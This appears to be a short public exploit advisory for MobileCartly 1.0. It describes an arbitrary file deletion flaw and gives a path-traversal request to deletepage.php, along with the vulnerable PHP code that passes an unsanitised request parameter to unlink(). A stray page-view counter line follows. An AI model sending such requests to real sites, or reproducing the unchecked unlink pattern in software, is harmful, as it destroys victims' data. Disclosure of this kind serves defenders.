# Exploit Title: MobileCartly 1.0 <= Arbitrary Delete Vulnerability # Date: 09/08/2012 # Author: GoLd_M # Vendor or Software Link: http://mobilecartly.com/mobilecartly.zip # Version: 1.0 # Category:: Arbitrary Delete Vulnerability # Google dork: :( # Tested on: Xp SP 2 # Ex : [MobileCartly 1.0]/includes/deletepage.php?deletepage=../[File] # Code Page /includes/deletepage.php # <? # # $page = "../pages/" . $_REQUEST['deletepage']; <<---XXX # # unlink($page); <<---XXX[Booooom] # # # ?>Брой прочитания на тази страница: 1166
MobileCartly 1.0 Arbitrary File Deletion Vulnerability